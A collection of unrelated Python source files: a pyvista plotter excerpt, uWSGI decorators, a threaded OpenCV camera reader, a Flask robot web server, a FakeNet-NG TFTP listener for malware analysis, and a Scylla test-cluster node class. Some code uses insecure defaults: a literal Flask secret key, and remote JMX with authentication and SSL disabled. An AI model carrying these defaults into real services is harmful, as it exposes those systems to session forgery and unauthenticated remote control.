border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False,
splitting_position=None, title=None):
"""Initialize a vtk plotting object."""
super(Plotter, self).__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width,
splitting_position=splitting_position,
title=title)
log.debug('Initializing')
def on_timer(iren, event_id):
"""Exit application if interactive renderer stops."""
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = rcParams['window_size']
if multi_samples is None:
multi_samples = rcParams['multi_samples']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style()
self.iren.AddObserver("KeyPressEvent", self.key_press_event)
self.update_style()
# for renderer in self.renderers:
# self.iren.SetRenderWindow(renderer)
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
if hasattr(self, 'iren'):
self.iren.AddObserver(vtk.vtkCommand.TimerEvent, on_timer)
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None, cpos=None,
height=400):
"""Create a plotting window.
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits the plotting session when the user
closes the window while ``interactive`` is True.
interactive_update : bool, optional
Disabled by default. Allows the user to draw without blocking;
the user should call ``update()`` in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
cpos : list(tuple(floats))
The camera position to use
height : int, optional
height for panel pane. Only used with panel.
Return
------
cpos : list
List of camera position, focal point, and view up
"""
if use_panel is None:
use_panel = rcParams['use_panel']
if auto_close is None:
auto_close = rcParams['auto_close']
# reset the camera for the first render unless the camera is already set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.ren_win.Render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
disp = None
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
elif self.notebook and use_panel and not hasattr(self, 'volume'):
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=height)
except:
pass
# NOTE: after this point, nothing from the render window can be accessed
# as if a user pressed the close button, then it destroys the
# render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Get camera position before closing
cpos = self.camera_position
# NOTE: our conversion to panel currently does not support multi-view
# so we should display the static screenshot in notebooks for
# multi-view plots until we implement this feature
# If notebook is true and panel display failed:
if self.notebook and (disp is None or self.shape != (1,1)):
import PIL.Image
# sanity check
try:
import IPython
except ImportError:
raise Exception('Install IPython to display image in a notebook')
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
# Cleanup
if auto_close:
self.close()
# Return the notebook display: either panel object or image display
if self.notebook:
return disp
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
return cpos, self.last_image
# default to returning last used camera position
return cpos
def plot(self, *args, **kwargs):
"""Create a plotting window.
Present for backwards compatibility.
DEPRECATED: Please use `show()` instead.
"""
logging.warning("`.plot()` is deprecated. Please use `.show()` instead.")
return self.show(*args, **kwargs)
def render(self):
"""Render the main window."""
self.ren_win.Render()
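# Minimal end-to-end sketch of the Plotter defined above. This block is an
# illustration added to the excerpt, not part of the original module; it
# assumes the public pyvista API (``pyvista.Sphere``) and is guarded so that
# importing the module never opens a render window. 'sphere.png' is a
# hypothetical output file name.
if __name__ == "__main__":
    import pyvista
    sphere = pyvista.Sphere()
    pl = pyvista.Plotter(off_screen=True)  # render off screen; no display required
    pl.add_mesh(sphere, color='red', show_edges=True)
    pl.show(screenshot='sphere.png')  # renders, saves the image, then auto-closes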
|
uwsgidecorators.py
|
from functools import partial
import sys
from threading import Thread
try:
import cPickle as pickle
except ImportError:
import pickle
import uwsgi
if uwsgi.masterpid() == 0:
raise Exception(
"you have to enable the uWSGI master process to use this module")
spooler_functions = {}
mule_functions = {}
postfork_chain = []
# Python3 compatibility
def _encode1(val):
if sys.version_info >= (3, 0) and isinstance(val, str):
return val.encode('utf-8')
else:
return val
def _decode1(val):
if sys.version_info >= (3, 0) and isinstance(val, bytes):
return val.decode('utf-8')
else:
return val
def _encode_to_spooler(vars):
return dict((_encode1(K), _encode1(V)) for (K, V) in vars.items())
def _decode_from_spooler(vars):
return dict((_decode1(K), _decode1(V)) for (K, V) in vars.items())
def get_free_signal():
for signum in range(0, 256):
if not uwsgi.signal_registered(signum):
return signum
raise Exception("No free uwsgi signal available")
def manage_spool_request(vars):
# To check whether 'args' is in vars, decode the keys first,
# because in Python 3 all keys in 'vars' are of type 'bytes'
vars = dict((_decode1(K), V) for (K, V) in vars.items())
if 'args' in vars:
for k in ('args', 'kwargs'):
vars[k] = pickle.loads(vars.pop(k))
vars = _decode_from_spooler(vars)
f = spooler_functions[vars['ud_spool_func']]
if 'args' in vars:
ret = f(*vars['args'], **vars['kwargs'])
else:
ret = f(vars)
return int(vars.get('ud_spool_ret', ret))
def postfork_chain_hook():
for f in postfork_chain:
f()
uwsgi.spooler = manage_spool_request
uwsgi.post_fork_hook = postfork_chain_hook
class postfork(object):
def __init__(self, f):
if callable(f):
self.wid = 0
self.f = f
else:
self.f = None
self.wid = f
postfork_chain.append(self)
def __call__(self, *args, **kwargs):
if self.f:
if self.wid > 0 and self.wid != uwsgi.worker_id():
return
return self.f()
self.f = args[0]
class _spoolraw(object):
def __call__(self, *args, **kwargs):
arguments = self.base_dict.copy()
if not self.pass_arguments:
if len(args) > 0:
arguments.update(args[0])
if kwargs:
arguments.update(kwargs)
else:
spooler_args = {}
for key in ('message_dict', 'spooler', 'priority', 'at', 'body'):
if key in kwargs:
spooler_args.update({key: kwargs.pop(key)})
arguments.update(spooler_args)
arguments.update(
{'args': pickle.dumps(args), 'kwargs': pickle.dumps(kwargs)})
return uwsgi.spool(_encode_to_spooler(arguments))
# For backward compatibility (uWSGI < 1.9.13)
def spool(self, *args, **kwargs):
return self.__class__.__call__(self, *args, **kwargs)
def __init__(self, f, pass_arguments):
if 'spooler' not in uwsgi.opt:
raise Exception(
"you have to enable the uWSGI spooler to use @%s decorator" % self.__class__.__name__)
self.f = f
spooler_functions[self.f.__name__] = self.f
# For backward compatibility (uWSGI < 1.9.13)
self.f.spool = self.__call__
self.pass_arguments = pass_arguments
self.base_dict = {'ud_spool_func': self.f.__name__}
class _spool(_spoolraw):
def __call__(self, *args, **kwargs):
self.base_dict['ud_spool_ret'] = str(uwsgi.SPOOL_OK)
return _spoolraw.__call__(self, *args, **kwargs)
class _spoolforever(_spoolraw):
def __call__(self, *args, **kwargs):
self.base_dict['ud_spool_ret'] = str(uwsgi.SPOOL_RETRY)
return _spoolraw.__call__(self, *args, **kwargs)
def spool_decorate(f=None, pass_arguments=False, _class=_spoolraw):
if not f:
return partial(_class, pass_arguments=pass_arguments)
return _class(f, pass_arguments)
def spoolraw(f=None, pass_arguments=False):
return spool_decorate(f, pass_arguments)
def spool(f=None, pass_arguments=False):
return spool_decorate(f, pass_arguments, _spool)
def spoolforever(f=None, pass_arguments=False):
return spool_decorate(f, pass_arguments, _spoolforever)
class mulefunc(object):
def __init__(self, f):
if callable(f):
self.fname = f.__name__
self.mule = 0
mule_functions[f.__name__] = f
else:
self.mule = f
self.fname = None
def real_call(self, *args, **kwargs):
uwsgi.mule_msg(pickle.dumps(
{
'service': 'uwsgi_mulefunc',
'func': self.fname,
'args': args,
'kwargs': kwargs
}
), self.mule)
def __call__(self, *args, **kwargs):
if not self.fname:
self.fname = args[0].__name__
mule_functions[self.fname] = args[0]
return self.real_call
return self.real_call(*args, **kwargs)
def mule_msg_dispatcher(message):
msg = pickle.loads(message)
if msg['service'] == 'uwsgi_mulefunc':
return mule_functions[msg['func']](*msg['args'], **msg['kwargs'])
uwsgi.mule_msg_hook = mule_msg_dispatcher
class rpc(object):
def __init__(self, name):
self.name = name
def __call__(self, f):
uwsgi.register_rpc(self.name, f)
return f
class farm_loop(object):
def __init__(self, f, farm):
self.f = f
self.farm = farm
def __call__(self):
if uwsgi.mule_id() == 0:
return
if not uwsgi.in_farm(self.farm):
return
while True:
message = uwsgi.farm_get_msg()
if message:
self.f(message)
class farm(object):
def __init__(self, name=None, **kwargs):
self.name = name
def __call__(self, f):
postfork_chain.append(farm_loop(f, self.name))
class mule_brain(object):
def __init__(self, f, num):
self.f = f
self.num = num
def __call__(self):
if uwsgi.mule_id() == self.num:
try:
self.f()
except:
exc = sys.exc_info()
sys.excepthook(exc[0], exc[1], exc[2])
sys.exit(1)
class mule_brainloop(mule_brain):
def __call__(self):
if uwsgi.mule_id() == self.num:
while True:
try:
self.f()
except:
exc = sys.exc_info()
sys.excepthook(exc[0], exc[1], exc[2])
sys.exit(1)
class mule(object):
def __init__(self, num):
self.num = num
def __call__(self, f):
postfork_chain.append(mule_brain(f, self.num))
class muleloop(mule):
def __call__(self, f):
postfork_chain.append(mule_brainloop(f, self.num))
class mulemsg_loop(object):
def __init__(self, f, num):
self.f = f
self.num = num
def __call__(self):
if uwsgi.mule_id() == self.num:
while True:
message = uwsgi.mule_get_msg()
if message:
self.f(message)
class mulemsg(object):
def __init__(self, num):
self.num = num
def __call__(self, f):
postfork_chain.append(mulemsg_loop(f, self.num))
class signal(object):
def __init__(self, num, **kwargs):
self.num = num
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
return f
class timer(object):
def __init__(self, secs, **kwargs):
self.num = kwargs.get('signum', get_free_signal())
self.secs = secs
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
uwsgi.add_timer(self.num, self.secs)
return f
class cron(object):
def __init__(self, minute, hour, day, month, dayweek, **kwargs):
self.num = kwargs.get('signum', get_free_signal())
self.minute = minute
self.hour = hour
self.day = day
self.month = month
self.dayweek = dayweek
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
uwsgi.add_cron(self.num, self.minute, self.hour,
self.day, self.month, self.dayweek)
return f
class rbtimer(object):
def __init__(self, secs, **kwargs):
self.num = kwargs.get('signum', get_free_signal())
self.secs = secs
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
uwsgi.add_rb_timer(self.num, self.secs)
return f
class filemon(object):
def __init__(self, fsobj, **kwargs):
self.num = kwargs.get('signum', get_free_signal())
self.fsobj = fsobj
self.target = kwargs.get('target', '')
def __call__(self, f):
uwsgi.register_signal(self.num, self.target, f)
uwsgi.add_file_monitor(self.num, self.fsobj)
return f
class erlang(object):
def __init__(self, name):
self.name = name
def __call__(self, f):
uwsgi.erlang_register_process(self.name, f)
return f
class lock(object):
def __init__(self, f):
self.f = f
def __call__(self, *args, **kwargs):
# ensure the spooler will not call it
if uwsgi.i_am_the_spooler():
return
uwsgi.lock()
try:
return self.f(*args, **kwargs)
finally:
uwsgi.unlock()
class thread(object):
def __init__(self, f):
self.f = f
def __call__(self, *args):
t = Thread(target=self.f, args=args)
t.daemon = True
t.start()
return self.f
class harakiri(object):
def __init__(self, seconds):
self.s = seconds
def real_call(self, *args, **kwargs):
uwsgi.set_user_harakiri(self.s)
r = self.f(*args, **kwargs)
uwsgi.set_user_harakiri(0)
return r
def __call__(self, f):
self.f = f
return self.real_call
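# Illustrative usage sketch (added for clarity, not part of the original module).
# Under a uWSGI instance started with a spooler and at least one mule, the decorators
# above are typically applied like this:
#
#     @spool                  # body runs inside the spooler process
#     def send_mail(arguments):
#         deliver(arguments)              # deliver() is placeholder application code
#
#     send_mail(body='hello')             # enqueues a spool job via uwsgi.spool()
#
#     @timer(60)              # fires every 60 seconds on a free uWSGI signal
#     def cleanup(signum):
#         purge_stale_sessions()          # placeholder application code
#
#     @lock                   # serialized across workers via uwsgi.lock()/unlock()
#     def update_counter():
#         bump_shared_counter()           # placeholder application code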
|
camera.py
|
"""
camera.py
Camera.py is responsible for activating the camera through threads. Through it, other classes and methods can
instantiate it whenever image capture is needed, or even capture continuously until the thread is stopped.
"""
from threading import Thread
import cv2
class Camera:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
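# Usage sketch (added for illustration, not part of the original module). Assuming
# OpenCV can open the default capture device (index 0), the threaded reader is
# typically driven like this:
#
#     cam = Camera(src=0).start()     # spawns the update() thread
#     frame = cam.read()              # always returns the most recently grabbed frame
#     cam.stop()                      # asks the update() loop to exit
#     cam.stream.release()            # release the underlying cv2.VideoCapture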
|
webserver.py
|
#!/usr/bin/python
""" webserver.py - Flask based web server to handle all legal requests.
Copyright (C) 2019 Basler AG
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
import http
def set_led(red, green, blue):
""" Use the hucon eye driver to set the eye color.
"""
try:
from hucon import Eye
Eye(1, Eye.RGB).set_color(red, green, blue)
Eye(2, Eye.RGB).set_color(red, green, blue)
Eye(3, Eye.RGB).set_color(red, green, blue)
Eye(4, Eye.RGB).set_color(red, green, blue)
except Exception as ex:
print(ex)
# Set the led eyes to yellow at the beginning
set_led(249, 166, 2)
import argparse
import logging
import threading
import time
try:
import httplib
except:
import http.client as httplib
from flask import Flask
from flask import request
from flask import render_template
from flask_socketio import SocketIO
from HuConJsonRpc import HuConJsonRpc
json_rpc = HuConJsonRpc()
COLLECT_STATIC_ROOT = "/opt/hucon/webserver/static"
COLLECT_STORAGE = 'flask_collect.storage.file'
app = Flask(json_rpc._SERVER_NAME)
app.config["SECRET_KEY"] = "SECRET_KEY"
socketio = SocketIO(app, logger=True)#, async_mode='eventlet'
@app.context_processor
def detect_browser_language():
""" Returns the current user browser language.
"""
supported_browser_languages = ["en", "de"]
lang = request.accept_languages.best_match(supported_browser_languages)
if lang is None:
lang = 'en'
return dict(browser_language=lang)
@app.route('/')
@app.route('/index.html')
def index():
""" Returns index page
"""
return render_template('index.html')
@app.route('/blockly.html')
def blockly():
""" Returns blockly programming page
"""
return render_template('blockly.html')
@app.route('/editor.html')
def editor():
""" Returns python editor page
"""
return render_template('editor.html')
@app.route('/mobile.html')
def mobile():
""" Returns mobile page
"""
return render_template('mobile.html')
@app.route('/settings.html')
def settings():
""" Returns settings page
"""
return render_template('settings.html')
@app.route('/remote_control.html')
def remote_control():
""" Returns remote control page
"""
return render_template('remote_control.html')
@app.route('/API', methods=['GET', 'POST'])
def api():
""" Returns api page or handle the request on POST
"""
if request.method == 'POST':
data = request.get_json(force=True)
if not data:
return ('Bad Request.', 400)
return json_rpc.handle_control(data)
return render_template('api.html')
@app.before_first_request
def before_first_request():
""" Set the eyes to green and after a while to off.
This will gibe the user teh ability to see that the service is running.
"""
set_led(0, 255, 0)
time.sleep(2)
set_led(0, 0, 0)
def check_service():
""" Check if the page is running.
"""
not_started = True
while not_started:
time.sleep(10)
try:
conn = http.client.HTTPConnection('localhost', json_rpc._LISTENING_PORT, timeout=5)
conn.request('GET', '/')
res = conn.getresponse()
if res.status == 200:
not_started = False
except Exception as ex:
print(ex)
if __name__ == '__main__':
""" Create the Server and listen on each incoming request.
"""
parser = argparse.ArgumentParser(description='Start the %s web server.' % json_rpc._SERVER_NAME)
parser.add_argument('--debug',
dest='debug',
action='store_true',
help='Print more debug messages on the console during running.')
args = parser.parse_args()
if not args.debug:
# Reduce the log messages.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# Run a thread to check the flask service.
# thread = threading.Thread(target=check_service)
# thread.start()
socketio.start_background_task(target=check_service)
socketio.run(app, host='0.0.0.0', port=json_rpc._LISTENING_PORT, debug=args.debug)
|
TFTPListener.py
|
import logging
import os
import sys
import threading
import SocketServer
import socket
import struct
import urllib
from . import *
EXT_FILE_RESPONSE = {
'.html': 'FakeNet.html',
'.png' : 'FakeNet.png',
'.ico' : 'FakeNet.ico',
'.jpeg': 'FakeNet.jpg',
'.exe' : 'FakeNetMini.exe',
'.pdf' : 'FakeNet.pdf',
'.xml' : 'FakeNet.html',
'.txt' : 'FakeNet.txt',
}
OPCODE_RRQ = "\x00\x01"
OPCODE_WRQ = "\x00\x02"
OPCODE_DATA = "\x00\x03"
OPCODE_ACK = "\x00\x04"
OPCODE_ERROR = "\x00\x05"
BLOCKSIZE = 512
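# Wire-format note (added for clarity, not part of the original listener): an RRQ/WRQ
# packet is the 2-byte opcode followed by a NUL-terminated filename and a
# NUL-terminated transfer mode, which is what taste() sizes against and what
# parse_rrq_wrq_packet() splits apart, e.g.:
#
#     rrq = OPCODE_RRQ + 'FakeNet.txt' + '\x00' + 'octet' + '\x00'
#
# DATA packets are the opcode, a 2-byte big-endian block number and up to BLOCKSIZE
# bytes of payload, as built in handle_rrq():
#
#     data = OPCODE_DATA + struct.pack('!H', 1) + payload[:BLOCKSIZE]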
class TFTPListener():
def taste(self, data, dport):
max_filename_size = 128
max_mode_size = len('netascii')
max_rrq_wrq_len = max_filename_size + max_mode_size + 4
min_rrq_wrq_len = 6
min_data_size = 5
max_data_size = BLOCKSIZE + 4
ack_size = 4
min_error_size = 5 + 1
max_error_msg_size = 128
max_error_size = 5 + max_error_msg_size
confidence = 1 if dport == 69 else 0
stripped = data.lstrip()
if (stripped.startswith(OPCODE_RRQ) or
stripped.startswith(OPCODE_WRQ)):
if len(data) >= min_rrq_wrq_len and len(data) <= max_rrq_wrq_len:
confidence += 2
elif stripped.startswith(OPCODE_DATA):
if len(data) >= min_data_size and len(data) <= max_data_size:
confidence += 2
elif stripped.startswith(OPCODE_ACK):
if len(data) == ack_size:
confidence += 2
elif stripped.startswith(OPCODE_ERROR):
if len(data) >= min_error_size and len(data) <= max_error_size:
confidence += 2
return confidence
def __init__(self,
config,
name='TFTPListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.name = 'TFTP'
self.port = self.config.get('port', 69)
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
path = self.config.get('tftproot', 'defaultFiles')
self.tftproot_path = ListenerBase.abs_config_path(path)
if self.tftproot_path is None:
self.logger.error('Could not locate tftproot directory: %s', path)
sys.exit(1)
self.tftp_file_prefix = self.config.get('tftpfileprefix', 'tftp')
def start(self):
self.logger.info('Starting...')
# Start listener
self.server = ThreadedUDPServer((self.local_ip, int(self.config['port'])), ThreadedUDPRequestHandler)
self.server.logger = self.logger
self.server.config = self.config
self.server.tftproot_path = self.tftproot_path
self.server.tftp_file_prefix = self.tftp_file_prefix
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.debug('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedUDPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
(data,socket) = self.request
if not data:
return
opcode = data[:2]
if opcode == OPCODE_RRQ:
filename, mode = self.parse_rrq_wrq_packet(data)
self.server.logger.info('Received request to download %s', filename)
self.handle_rrq(socket, filename)
elif opcode == OPCODE_WRQ:
filename, mode = self.parse_rrq_wrq_packet(data)
self.server.logger.info('Received request to upload %s', filename)
self.handle_wrq(socket, filename)
elif opcode == OPCODE_ACK:
block_num = struct.unpack('!H', data[2:4])[0]
self.server.logger.debug('Received ACK for block %d', block_num)
elif opcode == OPCODE_DATA:
self.handle_data(socket, data)
elif opcode == OPCODE_ERROR:
error_num = struct.unpack('!H', data[2:4])[0]
error_msg = data[4:]
self.server.logger.info('Received error message %d:%s', error_num, error_msg)
else:
self.server.logger.error('Unknown opcode: %d', struct.unpack('!H', data[:2])[0])
except Exception, e:
self.server.logger.error('Error: %s', e)
raise e
def handle_data(self, socket, data):
block_num = struct.unpack('!H', data[2:4])[0]
if hasattr(self.server, 'filename_path') and self.server.filename_path:
safe_file = self.server.tftp_file_prefix + "_" + urllib.quote(self.server.filename_path, '')
output_file = ListenerBase.safe_join(os.getcwd(),
safe_file)
f = open(output_file, 'ab')
f.write(data[4:])
f.close()
# Send ACK packet for the given block number
ack_packet = OPCODE_ACK + data[2:4]
socket.sendto(ack_packet, self.client_address)
else:
self.server.logger.error('Received DATA packet but don\'t know where to store it.')
def handle_rrq(self, socket, filename):
filename_path = ListenerBase.safe_join(self.server.tftproot_path,
filename)
# If the virtual filename does not exist, return a default file based on its extension
if not os.path.isfile(filename_path):
file_basename, file_extension = os.path.splitext(filename)
# Calculate absolute path to a fake file
filename_path = ListenerBase.safe_join(self.server.tftproot_path,
EXT_FILE_RESPONSE.get(file_extension.lower(), u'FakeNetMini.exe'))
self.server.logger.debug('Sending file %s', filename_path)
f = open(filename_path, 'rb')
i = 1
while True:
# Read in a buffer of blocksize from the file
data_block = f.read(BLOCKSIZE)
if not data_block or len(data_block) == 0:
break
data_packet = OPCODE_DATA + struct.pack('!H', i) + data_block
socket.sendto(data_packet, self.client_address)
i += 1
f.close()
def handle_wrq(self, socket, filename):
self.server.filename_path = filename
# Send acknowledgement so the client will begin writing
ack_packet = OPCODE_ACK + "\x00\x00"
socket.sendto(ack_packet, self.client_address)
def parse_rrq_wrq_packet(self, data):
filename, mode, _ = data[2:].split("\x00", 2)
return (filename, mode)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
###############################################################################
# Testing code
def test(config):
pass
def main():
"""
Run from the flare-fakenet-ng root dir with the following command:
python2 -m fakenet.listeners.TFTPListener
"""
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '69', 'protocol': 'udp', 'tftproot': 'defaultFiles'}
listener = TFTPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
#test(config)
listener.stop()
if __name__ == '__main__':
main()
|
scylla_node.py
|
# ccm node
from __future__ import with_statement
from datetime import datetime
import errno
import os
import signal
import shutil
import socket
import stat
import subprocess
import time
import threading
from distutils.version import LooseVersion
import psutil
import yaml
import glob
import re
from ccmlib.common import CASSANDRA_SH, BIN_DIR
from six import print_
from six.moves import xrange
from ccmlib import common
from ccmlib.node import Node, NodeUpgradeError
from ccmlib.node import Status
from ccmlib.node import NodeError
from ccmlib.node import TimeoutError
from ccmlib.scylla_repository import setup, CORE_PACKAGE_DIR_NAME, SCYLLA_VERSION_FILE
def wait_for(func, timeout, first=0.0, step=1.0, text=None):
"""
Wait until func() evaluates to True.
If func() evaluates to True before timeout expires, return the
value of func(). Otherwise return None.
:param func: Function that will be evaluated.
:param timeout: Timeout in seconds
:param first: Time to sleep before first attempt
:param step: Time to sleep between attempts in seconds
:param text: Text to print while waiting, for debug purposes
"""
start_time = time.time()
end_time = time.time() + timeout
time.sleep(first)
while time.time() < end_time:
if text:
print_("%s (%f secs)" % (text, (time.time() - start_time)))
output = func()
if output:
return output
time.sleep(step)
return None
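# Usage sketch (added for illustration, not part of the original module): poll a
# predicate until it becomes truthy or the timeout expires, e.g.
#
#     if wait_for(lambda: node.is_running(), timeout=60, step=2.0,
#                 text='waiting for node') is None:
#         raise TimeoutError('node did not start within 60 seconds')
#
# 'node' here stands in for any object exposing a boolean-returning check.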
class ScyllaNode(Node):
"""
Provides interactions to a Scylla node.
"""
def __init__(self, name, cluster, auto_bootstrap, thrift_interface,
storage_interface, jmx_port, remote_debug_port, initial_token,
save=True, binary_interface=None, scylla_manager=None):
self._node_install_dir = None
self._node_scylla_version = None
super(ScyllaNode, self).__init__(name, cluster, auto_bootstrap,
thrift_interface, storage_interface,
jmx_port, remote_debug_port,
initial_token, save, binary_interface)
self.__global_log_level = 'info'
self.__classes_log_level = {}
self.get_cassandra_version()
self._process_jmx = None
self._process_jmx_waiter = None
self._process_scylla = None
self._process_scylla_waiter = None
self._process_agent = None
self._process_agent_waiter = None
self._smp = 1
self._smp_set_during_test = False
self._mem_mb_per_cpu = 512
self._mem_set_during_test = False
self.__conf_updated = False
self.scylla_manager = scylla_manager
self.jmx_pid = None
self.agent_pid = None
self.upgraded = False
self.upgrader = NodeUpgrader(node=self)
self._create_directory()
@property
def node_install_dir(self):
if not self._node_install_dir:
self._node_install_dir = self.get_install_dir()
return self._node_install_dir
@node_install_dir.setter
def node_install_dir(self, install_dir):
self._node_install_dir = install_dir
@property
def node_scylla_version(self):
if not self._node_scylla_version:
self._node_scylla_version = self.get_node_scylla_version()
return self._node_scylla_version
@node_scylla_version.setter
def node_scylla_version(self, install_dir):
self._node_scylla_version = self.get_node_scylla_version(install_dir)
def scylla_mode(self):
return self.cluster.get_scylla_mode()
def is_scylla_reloc(self):
return self.cluster.is_scylla_reloc()
def set_smp(self, smp):
self._smp = smp
self._smp_set_during_test = True
def set_mem_mb_per_cpu(self, mem):
self._mem_mb_per_cpu = mem
self._mem_set_during_test = True
def get_install_cassandra_root(self):
return self.get_tools_java_dir()
def get_node_cassandra_root(self):
return os.path.join(self.get_path())
def get_conf_dir(self):
"""
Returns the path to the directory where Cassandra config are located
"""
return os.path.join(self.get_path(), 'conf')
def get_tool(self, toolname):
return common.join_bin(self.get_tools_java_dir(), BIN_DIR, toolname)
def get_tool_args(self, toolname):
raise NotImplementedError('ScyllaNode.get_tool_args')
def get_env(self):
update_conf = not self.__conf_updated
if update_conf:
self.__conf_updated = True
return common.make_cassandra_env(self.get_install_cassandra_root(),
self.get_node_cassandra_root(), update_conf=update_conf)
def get_cassandra_version(self):
# TODO: Handle versioning
return '3.0'
def set_log_level(self, new_level, class_name=None):
known_level = {'TRACE' : 'trace', 'DEBUG' : 'debug', 'INFO' : 'info', 'WARN' : 'warn', 'ERROR' : 'error', 'OFF' : 'info'}
if new_level not in known_level:
raise common.ArgumentError("Unknown log level %s (use one of %s)" % (new_level, " ".join(known_level)))
new_log_level = known_level[new_level]
# TODO class_name can be validated against help-loggers
if class_name:
self.__classes_log_level[class_name] = new_log_level
else:
self.__global_log_level = new_log_level
return self
def set_workload(self, workload):
raise NotImplementedError('ScyllaNode.set_workload')
def cpuset(self, id, count, cluster_id):
# leaving one core for other executables to run
allocated_cpus = psutil.cpu_count() - 1
start_id = (id * count + cluster_id) % allocated_cpus
cpuset = []
for cpuid in xrange(start_id, start_id + count):
cpuset.append(str(cpuid % allocated_cpus))
return cpuset
def _wait_for_jmx(self):
if self._process_jmx:
self._process_jmx.wait()
def _wait_for_scylla(self):
if self._process_scylla:
self._process_scylla.wait()
def _wait_for_agent(self):
if self._process_agent:
self._process_agent.wait()
def _start_jmx(self, data):
jmx_jar_dir = os.path.join(self.get_path(), BIN_DIR)
jmx_java_bin = os.path.join(jmx_jar_dir, 'symlinks', 'scylla-jmx')
jmx_jar = os.path.join(jmx_jar_dir, 'scylla-jmx-1.0.jar')
args = [jmx_java_bin,
'-Dapiaddress=%s' % data['listen_address'],
'-Djavax.management.builder.initial=com.scylladb.jmx.utils.APIBuilder',
'-Dcom.sun.management.jmxremote',
'-Dcom.sun.management.jmxremote.port=%s' % self.jmx_port,
'-Dcom.sun.management.jmxremote.rmi.port=%s' % self.jmx_port,
'-Dcom.sun.management.jmxremote.local.only=false',
'-Xmx256m',
'-XX:+UseSerialGC',
'-Dcom.sun.management.jmxremote.authenticate=false',
'-Dcom.sun.management.jmxremote.ssl=false',
'-jar',
jmx_jar]
log_file = os.path.join(self.get_path(), 'logs', 'system.log.jmx')
env_copy = os.environ
env_copy['SCYLLA_HOME'] = self.get_path()
with open(log_file, 'a') as jmx_log:
self._process_jmx = subprocess.Popen(args, stdout=jmx_log, stderr=jmx_log, close_fds=True, env=env_copy)
self._process_jmx.poll()
